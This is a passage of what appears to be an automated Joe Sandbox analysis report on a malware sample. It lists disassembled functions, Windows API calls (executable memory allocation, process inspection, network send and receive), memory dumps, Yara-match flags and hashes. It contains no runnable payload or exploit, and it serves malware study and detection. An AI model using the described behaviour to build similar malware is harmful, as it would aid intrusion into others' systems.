__floor_pentium4.LIBCMT ref: 03D8112F
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03D8115F
_memmove.LIBCMT ref: 03D8117B
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03D81192

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree__floor_pentium4_memmove
String ID:
API String ID: 1828152804-0
Opcode ID: a6f0ac45c2acd4d48dc04ac2879a1c29c7d1020b686d077778f1b2953135c6e2
Instruction ID: 1e07b8e36d1f3ceacc7e87f3a274b713433060ef9c757e0714af6267a90eed92
Opcode Fuzzy Hash: a6f0ac45c2acd4d48dc04ac2879a1c29c7d1020b686d077778f1b2953135c6e2
Instruction Fuzzy Hash: DC119371A00709EBDB10EFA9D985B6EFBF8EF04705F0085A9E959E2240E671A9588750

Function 03D89770 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,03D85FA5,00000000), ref: 03D897A7
K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 03D897C0
CloseHandle.KERNEL32(00000000), ref: 03D897CB

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Process$CloseFileHandleImageNameOpen
String ID:
API String ID: 3793065779-0
Opcode ID: 491131867f91bb30fc34a80bab424542c546b250dc5830c24d9206fa17bd6aa5
Instruction ID: 7dfb1e06a1bf1186c209aef70fff17bb8158a83f9245ee1d172c6b4b25b5fa8e
Opcode Fuzzy Hash: 491131867f91bb30fc34a80bab424542c546b250dc5830c24d9206fa17bd6aa5
Instruction Fuzzy Hash: A7016572700208DBDB15FF74EC99A7EB3B8DF84B10F50459DE84ADB244EF31AA169650

Function 6C3532F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegisterClassA.USER32(6C47A988), ref: 6C353314
CreateWindowExA.USER32(00000000,Message Window,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 6C35333F

Strings

Message Window, xrefs: 6C353333

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: ClassCreateRegisterWindow
String ID: Message Window
API String ID: 3469048531-1814804990
Opcode ID: 674f605da0270932fe4ce4eb37455b0dd3d2895ce86a928b57043734a05172b8
Instruction ID: e3344f971d5632bf4121b568f459f8fdd61b790b136d61ba617d16df1c0a102d
Opcode Fuzzy Hash: 674f605da0270932fe4ce4eb37455b0dd3d2895ce86a928b57043734a05172b8
Instruction Fuzzy Hash: 3BE0E5F0312610BEEF16EF60CC0AF327A7CEB06201B12AD19F90086210D671A8609F31

Function 032B01D9 Relevance: 4.8, APIs: 3, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 032B0239

Memory Dump Source

Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: 3c0fb143d31e3f100cc5ec664f8a917e0b68f2904c8a2ff18401ece0ee3b4e77
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: 38A18B70A10606EFDB15CFA9C880AAEF7B4FF48354F1880A9E455E7351D770EA90CB90

Function 03D83330 Relevance: 4.7, APIs: 3, Instructions: 151timeCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 03D83361
timeGetTime.WINMM(?,?,00000000), ref: 03D833E3
_memmove.LIBCMT ref: 03D83475

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memmove$Timetime
String ID:
API String ID: 3063443389-0
Opcode ID: ef987c293cc5033b21798a8eed0c3a5b6c18b04f195945ec1c03bd0c1d97245c
Instruction ID: cc97bcdd0bad92bddfaeaf469ad841d66708f5fec1ac3b46f72258514978fb82
Opcode Fuzzy Hash: ef987c293cc5033b21798a8eed0c3a5b6c18b04f195945ec1c03bd0c1d97245c
Instruction Fuzzy Hash: C2519F7EB00201AFD715EF7DC8C0A6AB7A9FF44A14718866CD91E9B704DB31F8568790

Function 03D83130 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 03D8313B
InterlockedExchange.KERNEL32(?,00000001), ref: 03D83153
GetCurrentThreadId.KERNEL32 ref: 03D831FF

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CurrentThread$ExchangeInterlocked
String ID:
API String ID: 4033114805-0
Opcode ID: 1080a9b7b31deb01c8548d77483133d066516028e4001fb1fae2d86b6a80225e
Instruction ID: 2b658892ddff07eeb2bedf6c82879cbf4af461767b2669afe693bbafe64b75dd
Opcode Fuzzy Hash: 1080a9b7b31deb01c8548d77483133d066516028e4001fb1fae2d86b6a80225e
Instruction Fuzzy Hash: 683134792006029FC718EF69C884A6AB3A8FF44F14B14C96DE85ECB615E731F846CB90

Function 03D858B0 Relevance: 4.6, APIs: 3, Instructions: 88memoryCOMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 03D858FF
SysFreeString.OLEAUT32(00000000), ref: 03D85914
SysAllocString.OLEAUT32(03DB5B0C), ref: 03D85965

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: String$AllocDecrementFreeInterlocked
String ID:
API String ID: 3605875487-0
Opcode ID: 696dc668599398f677b02b8467c0373c5408f555131563705de217d92dafdc24
Instruction ID: 127f1ca49ea376844020200ad17e9080a2a867c15889f706e60d3a0629a93b5c
Opcode Fuzzy Hash: 696dc668599398f677b02b8467c0373c5408f555131563705de217d92dafdc24
Instruction Fuzzy Hash: 3431A0B6A01714DBDB20FF65E880B5AB7A9EF05F60F084619EC49DB340E774E901CB90

Function 02F03130 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02F0313B
InterlockedExchange.KERNEL32(?,00000001), ref: 02F03153
GetCurrentThreadId.KERNEL32 ref: 02F031FF

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CurrentThread$ExchangeInterlocked
String ID:
API String ID: 4033114805-0
Opcode ID: c130ad3ab3d7a0d459ef569be0ab9dc9de472e0fe1a25fadf18027307d08ff61
Instruction ID: b266241525eb76e598c540df0148b95ed7943b855a53c4bf0ef1245a33da33f8
Opcode Fuzzy Hash: c130ad3ab3d7a0d459ef569be0ab9dc9de472e0fe1a25fadf18027307d08ff61
Instruction Fuzzy Hash: E2317A71A006029FD728DF69C8C4A6AB3E5FF48784B10C56DEA1ACB695D731FC41CB90

Function 02F011B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 02F011E9
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02F01226
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02F01255

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: 0600b145c49b6e56f2c3ca18ab2ccef2df5a22fb70c841921cb96de4263f3aa7
Instruction ID: 9cc00ef2416c600d8f06ce98a9c0a89760f176106b477e17c2742febdd07bdd7
Opcode Fuzzy Hash: 0600b145c49b6e56f2c3ca18ab2ccef2df5a22fb70c841921cb96de4263f3aa7
Instruction Fuzzy Hash: C121C271F003099BDB149FADE985B6FFBF8EF44745F4089A9E94DD2680E730A8108B44

Function 02F01100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 02F0112F
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02F0115F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02F01192

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: f305fc9b4e0d721398b1c08d0175a645e95381aaffe35d1e43c8e9082c0b2628
Instruction ID: 7083f12750b621d791e30ca5137aebc212da08529b5814fca96d1be6caa18456
Opcode Fuzzy Hash: f305fc9b4e0d721398b1c08d0175a645e95381aaffe35d1e43c8e9082c0b2628
Instruction Fuzzy Hash: 1B11B470E40309ABEB109FA9DC85B6FFBF8FF04785F008469EA5DD2280E73098148B54

Function 03D94AA0 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03D94AC4
GdipDisposeImage.GDIPLUS(?), ref: 03D94AD8
GdipDisposeImage.GDIPLUS(?), ref: 03D94AFB

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Gdip$DisposeImage$BitmapCreateFromStream
String ID:
API String ID: 800915452-0
Opcode ID: 140e8d26d65424c6db67e7d812534c5b166dc63659001001fa1a91b2d2d18cfb
Instruction ID: ecf552a1a7441b51de5f610d51b6c3fec433310e4a8a6a13efa9ac038aa2ae62
Opcode Fuzzy Hash: 140e8d26d65424c6db67e7d812534c5b166dc63659001001fa1a91b2d2d18cfb
Instruction Fuzzy Hash: 62F08C7690022DEBCB10FF94E9448EFB7B8EB48715B04464EE905A7300E6308A068BE0

Function 03D94780 Relevance: 4.5, APIs: 3, Instructions: 36COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(03DC1EA4), ref: 03D9479C
GdiplusStartup.GDIPLUS(03DC1EA0,?,?), ref: 03D947D5
LeaveCriticalSection.KERNEL32(03DC1EA4), ref: 03D947E6

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterGdiplusLeaveStartup
String ID:
API String ID: 389129658-0
Opcode ID: e377f3ff04a90f6ccd0e0dfac50d380deef2353d15d6969cbeb6cb2b671fabd2
Instruction ID: 07a3b9efb96358dd518aea47317ca619ea046ae281548e2d5912866190cfb2d4
Opcode Fuzzy Hash: e377f3ff04a90f6ccd0e0dfac50d380deef2353d15d6969cbeb6cb2b671fabd2
Instruction Fuzzy Hash: 2FF04F7296021ADFDB00DEA1D85A7EBBBB8F701705F640259E51492242D7B246888AE1

Function 02F07266 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 02F0726B

Part of subcall function 02F09965: GetLastError.KERNEL32(00000001,00000000,02F07222,02F0701C,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270), ref: 02F09969
Part of subcall function 02F09965: ___set_flsgetvalue.LIBCMT ref: 02F09977
Part of subcall function 02F09965: __calloc_crt.LIBCMT ref: 02F0998B
Part of subcall function 02F09965: DecodePointer.KERNEL32(00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000,?,02F09A89), ref: 02F099A5
Part of subcall function 02F09965: GetCurrentThreadId.KERNEL32 ref: 02F099BB
Part of subcall function 02F09965: SetLastError.KERNEL32(00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000,?,02F09A89), ref: 02F099D3

__freeptd.LIBCMT ref: 02F07275

Part of subcall function 02F09B27: TlsGetValue.KERNEL32(?,?,02F07821,00000000,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09B48
Part of subcall function 02F09B27: TlsGetValue.KERNEL32(?,?,02F07821,00000000,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09B5A
Part of subcall function 02F09B27: DecodePointer.KERNEL32(00000000,?,02F07821,00000000,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09B70
Part of subcall function 02F09B27: __freefls@4.LIBCMT ref: 02F09B7B
Part of subcall function 02F09B27: TlsSetValue.KERNEL32(0000002A,00000000,?,02F07821,00000000,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09B8D

ExitThread.KERNEL32 ref: 02F0727E

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
String ID:
API String ID: 4224061863-0
Opcode ID: f817c1f1009f934614188406f126711d5af074cb6f9bf68a6e7cfb3210496ea4
Instruction ID: dd570616691d3250c208961882ddf71b6ee63debdd3a30f339bbad57daabf7e5
Opcode Fuzzy Hash: f817c1f1009f934614188406f126711d5af074cb6f9bf68a6e7cfb3210496ea4
Instruction Fuzzy Hash: 57C08C618002082A9B203B318C9890A7A4EE9807E0B8104107A1891081EFA0E800E850

Function 6C353FFB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6C354005

Part of subcall function 6C353021: _memset.LIBCMT ref: 6C35304F
Part of subcall function 6C353021: GetModuleFileNameA.KERNEL32(?,000000FF), ref: 6C353124

Part of subcall function 6C374AFA: _fgetc.LIBCMT ref: 6C374B43
Part of subcall function 6C374AFA: _sprintf.LIBCMT ref: 6C374B6F

Strings

astrolog.as, xrefs: 6C35400F

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: FileH_prolog3_catch_ModuleName_fgetc_memset_sprintf
String ID: astrolog.as
API String ID: 2788110157-2633699130
Opcode ID: 26895dcdbb299c02d7715fb58d190bac59646ed244d366dda658a8eefab56255
Instruction ID: b09f66b190429933970bdb6bacb4aa5dec63133cd84504e6dbd43bb0838ba3d0
Opcode Fuzzy Hash: 26895dcdbb299c02d7715fb58d190bac59646ed244d366dda658a8eefab56255
Instruction Fuzzy Hash: 10F03A717462908ADF68FFA69880CE8B670AB0A60D370193FD15287A84CB71C0699F96

Function 03BF01CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 03BF022B

Memory Dump Source

Source File: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3bf0000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: 7c1d9599afd8a32a79f0b980ec96ddd8931cb7807fe209cc26fb1b8b9d05c5d0
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: 63A14D74A00606EFDB14DFA9C880AADF7B5FF48308F1891B9E615D7262D730EA55CB90

Function 02F03340 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(?,?,00000000), ref: 02F033F3
_memmove.LIBCMT ref: 02F03485

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Time_memmovetime
String ID:
API String ID: 1463837790-0
Opcode ID: 1c9688e62d3bc12022b9b5cafefecbebdaa40d94c8a2101d8d7dfc87ed816473
Instruction ID: 27bb2f889f6fa3b2e9e3359ec694e7ddb4f8c8bf15d882a5665f497174f7766e
Opcode Fuzzy Hash: 1c9688e62d3bc12022b9b5cafefecbebdaa40d94c8a2101d8d7dfc87ed816473
Instruction Fuzzy Hash: 3251D576B002019FD715CF69C9C0A6BB7A5BF4439470486ACEA19CB780DB31FC51DB90

Function 03D82FA0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03D83013
recv.WS2_32(?,?,00040000,00000000), ref: 03D83034

Part of subcall function 03D9ADE6: __getptd_noexit.LIBCMT ref: 03D9ADE6

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: __getptd_noexitrecvselect
String ID:
API String ID: 4248608111-0
Opcode ID: 7730b106918f1b793ea48fa151fed7aa320f969ec7062de4debbef6c1cb02b84
Instruction ID: 2e441a9226b0ac0789f588c417e114f7aa11dc6363c09033f33b3a4ef32146d8
Opcode Fuzzy Hash: 7730b106918f1b793ea48fa151fed7aa320f969ec7062de4debbef6c1cb02b84
Instruction Fuzzy Hash: C021967D900308DFEB20FF64CC89B9A77A4EF05B10F144595E5495F290D7B4AD94CBA1

Function 03D83230 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,00040000,00000000), ref: 03D83261
send.WS2_32(?,?,?,00000000), ref: 03D8329E

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 6e98804d290bafdecbef0a6d776ca3bf2e65ffacdece225b45f1e95ff652c73c
Instruction ID: 94c7972a752d1d25d64d639d705ccf046beb6962200a3196ca2b6a6f399b2527
Opcode Fuzzy Hash: 6e98804d290bafdecbef0a6d776ca3bf2e65ffacdece225b45f1e95ff652c73c
Instruction Fuzzy Hash: 8E11A57EA01304EBDB60EB6EDC84B5EB7A9FB81B64F154125F90CDB280D270BA418760

Function 02F03230 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,00040000,00000000), ref: 02F03261
send.WS2_32(?,?,?,00000000), ref: 02F0329E

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 2f8e13efcab34719ee669471c8138ac35285f6b763d809db69902073aba266ed
Instruction ID: 38206247f0a6bfb4d592394ce230c2803811ca1bdd9d547a454a85f4ad48ee00
Opcode Fuzzy Hash: 2f8e13efcab34719ee669471c8138ac35285f6b763d809db69902073aba266ed
Instruction Fuzzy Hash: 4611E572F01244ABDB20CA2ADCC4B5EB7A9EB893A8F1141A1EB0CD71C0D270AA41A750

Function 03D830B0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 03D830DA
timeGetTime.WINMM ref: 03D830F4

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: e9bbbeaa825b0a8b301071663a0408dbce67db7ffbfc0fd580f66b3bdd01b5dd
Instruction ID: f3b2f25c4998f9b8a35db3399feb3df55bc47365226a0d06b6d32347e0948974
Opcode Fuzzy Hash: e9bbbeaa825b0a8b301071663a0408dbce67db7ffbfc0fd580f66b3bdd01b5dd
Instruction Fuzzy Hash: AF01D439600209EFD314EF18C8C8BADF3A5FB55B00F184268D10887290C770BAD5C7E1

Function 02F030B0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 02F030DA
timeGetTime.WINMM ref: 02F030F4

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: 6b1ce1e481a967d54c9757fa0ac3b9a9f6354afbeef0ff60f862630dc050ff47
Instruction ID: 7108c041beeb2ee953983b04570fc15fabf88f6971795a9039bf557ba953d5df
Opcode Fuzzy Hash: 6b1ce1e481a967d54c9757fa0ac3b9a9f6354afbeef0ff60f862630dc050ff47
Instruction Fuzzy Hash: 4501B131A0020AAFE310CF69C8C8BA9F3A5FB99384F544264D2048B2C0C770A995D7E1

Function 03D979D0 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000004,00000000,00000000,03D98BF9,00000000,03D944C0,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D979EB
_free.LIBCMT ref: 03D97A26

Part of subcall function 03D81280: __CxxThrowException@8.LIBCMT ref: 03D81290

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CreateException@8HeapThrow_free
String ID:
API String ID: 1065114656-0
Opcode ID: 57c04831de9a115aea088a71e8539faed43fb4fb52ee1239ccbcfe583f1895c2
Instruction ID: 3801b087cf592f587f340f76507f95aca58ce542dd0f04920fd668dd013ed289
Opcode Fuzzy Hash: 57c04831de9a115aea088a71e8539faed43fb4fb52ee1239ccbcfe583f1895c2
Instruction Fuzzy Hash: 12017AF1A00B448FD721DF2A8844A57FAE8FF99700B144A1ED2DAC6B20D375A105CB95

Function 02F06510 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000004,00000000,00000000,02F061BF,00000000,02F05AE2), ref: 02F0652B
_free.LIBCMT ref: 02F06566

Part of subcall function 02F01280: __CxxThrowException@8.LIBCMT ref: 02F01290
